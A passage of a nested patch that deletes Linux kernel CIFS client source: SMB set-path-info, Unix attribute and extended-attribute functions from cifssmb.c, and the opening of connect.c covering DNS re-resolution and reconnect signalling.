+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = fileName,
+-		.fid = &fid,
+-	};
+-
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc)
+-		goto out;
+-
+-	rc = CIFSSMBSetFileInfo(xid, tcon, data, fid.netfid, current->tgid);
+-	CIFSSMBClose(xid, tcon, fid.netfid);
+-out:
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		   const char *fileName, const FILE_BASIC_INFO *data,
+-		   const struct nls_table *nls_codepage,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	char *data_offset;
+-	__u16 params, param_offset, offset, byte_count, count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In SetTimes\n");
+-
+-SetTimesRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(FILE_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	data_offset = (char *) (&pSMB->hdr.Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (times) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetTimesRetry;
+-
+-	if (rc == -EOPNOTSUPP)
+-		return CIFSSMBSetPathInfoFB(xid, tcon, fileName, data,
+-					    nls_codepage, cifs_sb);
+-
+-	return rc;
+-}
+-
+-static void
+-cifs_fill_unix_set_info(FILE_UNIX_BASIC_INFO *data_offset,
+-			const struct cifs_unix_set_info_args *args)
+-{
+-	u64 uid = NO_CHANGE_64, gid = NO_CHANGE_64;
+-	u64 mode = args->mode;
+-
+-	if (uid_valid(args->uid))
+-		uid = from_kuid(&init_user_ns, args->uid);
+-	if (gid_valid(args->gid))
+-		gid = from_kgid(&init_user_ns, args->gid);
+-
+-	/*
+-	 * Samba server ignores set of file size to zero due to bugs in some
+-	 * older clients, but we should be precise - we use SetFileSize to
+-	 * set file size and do not want to truncate file size to zero
+-	 * accidentally as happened on one Samba server beta by putting
+-	 * zero instead of -1 here
+-	 */
+-	data_offset->EndOfFile = cpu_to_le64(NO_CHANGE_64);
+-	data_offset->NumOfBytes = cpu_to_le64(NO_CHANGE_64);
+-	data_offset->LastStatusChange = cpu_to_le64(args->ctime);
+-	data_offset->LastAccessTime = cpu_to_le64(args->atime);
+-	data_offset->LastModificationTime = cpu_to_le64(args->mtime);
+-	data_offset->Uid = cpu_to_le64(uid);
+-	data_offset->Gid = cpu_to_le64(gid);
+-	/* better to leave device as zero when it is  */
+-	data_offset->DevMajor = cpu_to_le64(MAJOR(args->device));
+-	data_offset->DevMinor = cpu_to_le64(MINOR(args->device));
+-	data_offset->Permissions = cpu_to_le64(mode);
+-
+-	if (S_ISREG(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_FILE);
+-	else if (S_ISDIR(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_DIR);
+-	else if (S_ISLNK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_SYMLINK);
+-	else if (S_ISCHR(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_CHARDEV);
+-	else if (S_ISBLK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_BLOCKDEV);
+-	else if (S_ISFIFO(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_FIFO);
+-	else if (S_ISSOCK(mode))
+-		data_offset->Type = cpu_to_le32(UNIX_SOCKET);
+-}
+-
+-int
+-CIFSSMBUnixSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const struct cifs_unix_set_info_args *args,
+-		       u16 fid, u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set Unix Info (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	data_offset = (char *)pSMB +
+-			offsetof(struct smb_hdr, Protocol) + offset;
+-
+-	count = sizeof(FILE_UNIX_BASIC_INFO);
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	cifs_fill_unix_set_info((FILE_UNIX_BASIC_INFO *)data_offset, args);
+-
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
+-			 rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		       const char *file_name,
+-		       const struct cifs_unix_set_info_args *args,
+-		       const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	FILE_UNIX_BASIC_INFO *data_offset;
+-	__u16 params, param_offset, offset, count, byte_count;
+-
+-	cifs_dbg(FYI, "In SetUID/GID/Mode\n");
+-setPermsRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, file_name);
+-	}
+-
+-	params = 6 + name_len;
+-	count = sizeof(FILE_UNIX_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (FILE_UNIX_BASIC_INFO *)((char *) pSMB + offset + 4);
+-	memset(data_offset, 0, count);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-
+-	cifs_fill_unix_set_info(data_offset, args);
+-
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (perms) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto setPermsRetry;
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_XATTR
+-/*
+- * Do a path-based QUERY_ALL_EAS call and parse the result. This is a common
+- * function used by listxattr and getxattr type calls. When ea_name is set,
+- * it looks for that attribute name and stuffs that value into the EAData
+- * buffer. When ea_name is NULL, it stuffs a list of attribute names into the
+- * buffer. In both cases, the return value is either the length of the
+- * resulting data or a negative error code. If EAData is a NULL pointer then
+- * the data isn't copied to it, but the length is returned.
+- */
+-ssize_t
+-CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
+-		const unsigned char *searchName, const unsigned char *ea_name,
+-		char *EAData, size_t buf_size,
+-		struct cifs_sb_info *cifs_sb)
+-{
+-		/* BB assumes one setup word */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int remap = cifs_remap(cifs_sb);
+-	struct nls_table *nls_codepage = cifs_sb->local_nls;
+-	int rc = 0;
+-	int bytes_returned;
+-	int list_len;
+-	struct fealist *ea_response_data;
+-	struct fea *temp_fea;
+-	char *temp_ptr;
+-	char *end_of_smb;
+-	__u16 params, byte_count, data_offset;
+-	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
+-
+-	cifs_dbg(FYI, "In Query All EAs path %s\n", searchName);
+-QAllEAsRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		list_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		list_len++;	/* trailing null */
+-		list_len *= 2;
+-	} else {
+-		list_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + list_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_QUERY_ALL_EAS);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryAllEAs = %d\n", rc);
+-		goto QAllEAsOut;
+-	}
+-
+-
+-	/* BB also check enough total bytes returned */
+-	/* BB we need to improve the validity checking
+-	of these trans2 responses */
+-
+-	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-	if (rc || get_bcc(&pSMBr->hdr) < 4) {
+-		rc = -EIO;	/* bad smb */
+-		goto QAllEAsOut;
+-	}
+-
+-	/* check that length of list is not more than bcc */
+-	/* check that each entry does not go beyond length
+-	   of list */
+-	/* check that each element of each entry does not
+-	   go beyond end of list */
+-	/* validate_trans2_offsets() */
+-	/* BB check if start of smb + data_offset > &bcc+ bcc */
+-
+-	data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-	ea_response_data = (struct fealist *)
+-				(((char *) &pSMBr->hdr.Protocol) + data_offset);
+-
+-	list_len = le32_to_cpu(ea_response_data->list_len);
+-	cifs_dbg(FYI, "ea length %d\n", list_len);
+-	if (list_len <= 8) {
+-		cifs_dbg(FYI, "empty EA list returned from server\n");
+-		/* didn't find the named attribute */
+-		if (ea_name)
+-			rc = -ENODATA;
+-		goto QAllEAsOut;
+-	}
+-
+-	/* make sure list_len doesn't go past end of SMB */
+-	end_of_smb = (char *)pByteArea(&pSMBr->hdr) + get_bcc(&pSMBr->hdr);
+-	if ((char *)ea_response_data + list_len > end_of_smb) {
+-		cifs_dbg(FYI, "EA list appears to go beyond SMB\n");
+-		rc = -EIO;
+-		goto QAllEAsOut;
+-	}
+-
+-	/* account for ea list len */
+-	list_len -= 4;
+-	temp_fea = ea_response_data->list;
+-	temp_ptr = (char *)temp_fea;
+-	while (list_len > 0) {
+-		unsigned int name_len;
+-		__u16 value_len;
+-
+-		list_len -= 4;
+-		temp_ptr += 4;
+-		/* make sure we can read name_len and value_len */
+-		if (list_len < 0) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto QAllEAsOut;
+-		}
+-
+-		name_len = temp_fea->name_len;
+-		value_len = le16_to_cpu(temp_fea->value_len);
+-		list_len -= name_len + 1 + value_len;
+-		if (list_len < 0) {
+-			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
+-			rc = -EIO;
+-			goto QAllEAsOut;
+-		}
+-
+-		if (ea_name) {
+-			if (ea_name_len == name_len &&
+-			    memcmp(ea_name, temp_ptr, name_len) == 0) {
+-				temp_ptr += name_len + 1;
+-				rc = value_len;
+-				if (buf_size == 0)
+-					goto QAllEAsOut;
+-				if ((size_t)value_len > buf_size) {
+-					rc = -ERANGE;
+-					goto QAllEAsOut;
+-				}
+-				memcpy(EAData, temp_ptr, value_len);
+-				goto QAllEAsOut;
+-			}
+-		} else {
+-			/* account for prefix user. and trailing null */
+-			rc += (5 + 1 + name_len);
+-			if (rc < (int) buf_size) {
+-				memcpy(EAData, "user.", 5);
+-				EAData += 5;
+-				memcpy(EAData, temp_ptr, name_len);
+-				EAData += name_len;
+-				/* null terminate name */
+-				*EAData = 0;
+-				++EAData;
+-			} else if (buf_size == 0) {
+-				/* skip copy - calc size only */
+-			} else {
+-				/* stop before overrun buffer */
+-				rc = -ERANGE;
+-				break;
+-			}
+-		}
+-		temp_ptr += name_len + 1 + value_len;
+-		temp_fea = (struct fea *)temp_ptr;
+-	}
+-
+-	/* didn't find the named attribute */
+-	if (ea_name)
+-		rc = -ENODATA;
+-
+-QAllEAsOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QAllEAsRetry;
+-
+-	return (ssize_t)rc;
+-}
+-
+-int
+-CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
+-	     const char *fileName, const char *ea_name, const void *ea_value,
+-	     const __u16 ea_value_len, const struct nls_table *nls_codepage,
+-	     struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	struct fealist *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, byte_count, offset, count;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	cifs_dbg(FYI, "In SetEA\n");
+-SetEARetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-
+-	/* done calculating parms using name_len of file name,
+-	now use name_len to calculate length of ea name
+-	we are going to create in the inode xattrs */
+-	if (ea_name == NULL)
+-		name_len = 0;
+-	else
+-		name_len = strnlen(ea_name, 255);
+-
+-	count = sizeof(*parm_data) + ea_value_len + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	pSMB->InformationLevel =
+-		cpu_to_le16(SMB_SET_FILE_EA);
+-
+-	parm_data = (void *)pSMB + offsetof(struct smb_hdr, Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	parm_data->list_len = cpu_to_le32(count);
+-	parm_data->list[0].EA_flags = 0;
+-	/* we checked above that name len is less than 255 */
+-	parm_data->list[0].name_len = (__u8)name_len;
+-	/* EA names are always ASCII */
+-	if (ea_name)
+-		strncpy(parm_data->list[0].name, ea_name, name_len);
+-	parm_data->list[0].name[name_len] = 0;
+-	parm_data->list[0].value_len = cpu_to_le16(ea_value_len);
+-	/* caller ensures that ea_value_len is less than 64K but
+-	we need to ensure that it fits within the smb */
+-
+-	/*BB add length check to see if it would fit in
+-	     negotiated SMB buffer size BB */
+-	/* if (ea_value_len > buffer_size - 512 (enough for header)) */
+-	if (ea_value_len)
+-		memcpy(parm_data->list[0].name+name_len+1,
+-		       ea_value, ea_value_len);
+-
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (EA) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetEARetry;
+-
+-	return rc;
+-}
+-#endif
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+deleted file mode 100644
+index 935fe198a4baf..0000000000000
+--- a/fs/cifs/connect.c
++++ /dev/null
+@@ -1,4754 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/net.h>
+-#include <linux/string.h>
+-#include <linux/sched/mm.h>
+-#include <linux/sched/signal.h>
+-#include <linux/list.h>
+-#include <linux/wait.h>
+-#include <linux/slab.h>
+-#include <linux/pagemap.h>
+-#include <linux/ctype.h>
+-#include <linux/utsname.h>
+-#include <linux/mempool.h>
+-#include <linux/delay.h>
+-#include <linux/completion.h>
+-#include <linux/kthread.h>
+-#include <linux/pagevec.h>
+-#include <linux/freezer.h>
+-#include <linux/namei.h>
+-#include <linux/uuid.h>
+-#include <linux/uaccess.h>
+-#include <asm/processor.h>
+-#include <linux/inet.h>
+-#include <linux/module.h>
+-#include <keys/user-type.h>
+-#include <net/ipv6.h>
+-#include <linux/parser.h>
+-#include <linux/bvec.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include "rfc1002pdu.h"
+-#include "fscache.h"
+-#include "smb2proto.h"
+-#include "smbdirect.h"
+-#include "dns_resolve.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#include "fs_context.h"
+-#include "cifs_swn.h"
+-
+-extern mempool_t *cifs_req_poolp;
+-extern bool disable_legacy_dialects;
+-
+-/* FIXME: should these be tunable? */
+-#define TLINK_ERROR_EXPIRE	(1 * HZ)
+-#define TLINK_IDLE_EXPIRE	(600 * HZ)
+-
+-/* Drop the connection to not overload the server */
+-#define NUM_STATUS_IO_TIMEOUT   5
+-
+-struct mount_ctx {
+-	struct cifs_sb_info *cifs_sb;
+-	struct smb3_fs_context *fs_ctx;
+-	unsigned int xid;
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	struct cifs_ses *root_ses;
+-	uuid_t mount_id;
+-	char *origin_fullpath, *leaf_fullpath;
+-#endif
+-};
+-
+-static int ip_connect(struct TCP_Server_Info *server);
+-static int generic_ip_connect(struct TCP_Server_Info *server);
+-static void tlink_rb_insert(struct rb_root *root, struct tcon_link *new_tlink);
+-static void cifs_prune_tlinks(struct work_struct *work);
+-
+-/*
+- * Resolve hostname and set ip addr in tcp ses. Useful for hostnames that may
+- * get their ip addresses changed at some point.
+- *
+- * This should be called with server->srv_mutex held.
+- */
+-static int reconn_set_ipaddr_from_hostname(struct TCP_Server_Info *server)
+-{
+-	int rc;
+-	int len;
+-	char *unc, *ipaddr = NULL;
+-	time64_t expiry, now;
+-	unsigned long ttl = SMB_DNS_RESOLVE_INTERVAL_DEFAULT;
+-
+-	if (!server->hostname)
+-		return -EINVAL;
+-
+-	/* if server hostname isn't populated, there's nothing to do here */
+-	if (server->hostname[0] == '\0')
+-		return 0;
+-
+-	len = strlen(server->hostname) + 3;
+-
+-	unc = kmalloc(len, GFP_KERNEL);
+-	if (!unc) {
+-		cifs_dbg(FYI, "%s: failed to create UNC path\n", __func__);
+-		return -ENOMEM;
+-	}
+-	scnprintf(unc, len, "\\\\%s", server->hostname);
+-
+-	rc = dns_resolve_server_name_to_ip(unc, &ipaddr, &expiry);
+-	kfree(unc);
+-
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "%s: failed to resolve server part of %s to IP: %d\n",
+-			 __func__, server->hostname, rc);
+-		goto requeue_resolve;
+-	}
+-
+-	spin_lock(&server->srv_lock);
+-	rc = cifs_convert_address((struct sockaddr *)&server->dstaddr, ipaddr,
+-				  strlen(ipaddr));
+-	spin_unlock(&server->srv_lock);
+-	kfree(ipaddr);
+-
+-	/* rc == 1 means success here */
+-	if (rc) {
+-		now = ktime_get_real_seconds();
+-		if (expiry && expiry > now)
+-			/*
+-			 * To make sure we don't use the cached entry, retry 1s
+-			 * after expiry.
+-			 */
+-			ttl = max_t(unsigned long, expiry - now, SMB_DNS_RESOLVE_INTERVAL_MIN) + 1;
+-	}
+-	rc = !rc ? -1 : 0;
+-
+-requeue_resolve:
+-	cifs_dbg(FYI, "%s: next dns resolution scheduled for %lu seconds in the future\n",
+-		 __func__, ttl);
+-	mod_delayed_work(cifsiod_wq, &server->resolve, (ttl * HZ));
+-
+-	return rc;
+-}
+-
+-static void smb2_query_server_interfaces(struct work_struct *work)
+-{
+-	int rc;
+-	struct cifs_tcon *tcon = container_of(work,
+-					struct cifs_tcon,
+-					query_interfaces.work);
+-
+-	/*
+-	 * query server network interfaces, in case they change
+-	 */
+-	rc = SMB3_request_interfaces(0, tcon, false);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: failed to query server interfaces: %d\n",
+-				__func__, rc);
+-	}
+-
+-	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
+-}
+-
+-static void cifs_resolve_server(struct work_struct *work)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, resolve.work);
+-
+-	cifs_server_lock(server);
+-
+-	/*
+-	 * Resolve the hostname again to make sure that IP address is up-to-date.
+-	 */
+-	rc = reconn_set_ipaddr_from_hostname(server);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: failed to resolve hostname: %d\n",
+-				__func__, rc);
+-	}
+-
+-	cifs_server_unlock(server);
+-}
+-
+-/*
+- * Update the tcpStatus for the server.
+- * This is used to signal the cifsd thread to call cifs_reconnect
+- * ONLY cifsd thread should call cifs_reconnect. For any other
+- * thread, use this function
+- *
+- * @server: the tcp ses for which reconnect is needed
+- * @all_channels: if this needs to be done for all channels
+- */
+-void
+-cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+-				bool all_channels)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	int i;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&pserver->srv_lock);
+-	if (!all_channels) {
+-		pserver->tcpStatus = CifsNeedReconnect;
+-		spin_unlock(&pserver->srv_lock);
+-		return;
+-	}
+-	spin_unlock(&pserver->srv_lock);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		spin_lock(&ses->chan_lock);
+-		for (i = 0; i < ses->chan_count; i++) {
+-			spin_lock(&ses->chans[i].server->srv_lock);
+-			ses->chans[i].server->tcpStatus = CifsNeedReconnect;
+-			spin_unlock(&ses->chans[i].server->srv_lock);
+-		}
+-		spin_unlock(&ses->chan_lock);
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-}
+-
+-/*
+- * Mark all sessions and tcons for reconnect.
+- * IMPORTANT: make sure that this gets called only from
+- * cifsd thread. For any other thread, use
+- * cifs_signal_cifsd_for_reconnect
+- *
+- * @server: the tcp ses for which reconnect is needed
